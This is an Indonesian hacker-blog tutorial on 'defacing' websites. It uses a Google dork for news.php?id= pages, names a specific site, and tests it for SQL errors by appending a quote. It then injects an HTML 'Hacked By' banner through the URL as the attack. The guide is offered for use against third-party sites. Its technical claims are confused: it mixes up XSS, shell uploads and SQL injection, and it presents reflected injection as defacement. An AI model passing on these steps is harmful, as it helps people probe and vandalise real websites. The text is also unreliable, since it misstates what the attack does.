Halo sobat om heker kali ini om heker akan menjelaskan sedikit tutorial Deface Metode XSS upload Shell atau disebut juga Cross Site Scripting Attack adalah metode dimana client memasukan script HTML kedalam sebuah website.
oke Berikut penjelasannya dari tutorial Deface Metode XSS :
1.) Dorking, Dork :
inurl:news.php?id= ( kembangkan )
2.) Pilih lah salah satu situs atau website.
Contohnya saya menggunakan situs :
http://www.jmtv.com/news.php?id=3
3.) Cobalah masukan ' dibelakang url contohnya :
http://www.jmtv.com/news.php?id=3'
Jika blank ataupun muncul sql bla bla berarti vuln contohnya situs yang saya gunakan ini muncul :
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 14.) Selanjutnya coba masukan script HTML dibelakang url contohnya :
http://www.jmtv.com/news.php?id=3%27<h1>Hacked By MastahCyber</h1>Tips! : Kalian juga bisa mengubahnya dengan script HTML lainnya.
Nah setelah seperti itu akan muncul seperti gambar dibawah ini berarti kita berhasil mendeface situs tersebut dengan metode xss ini.
Sekian tutorial tentang Deface Metode XSS sampai jumpa di tutorial menarik lainnya.
0 Response to "Tutorial Deface Metode XSS "
Post a Comment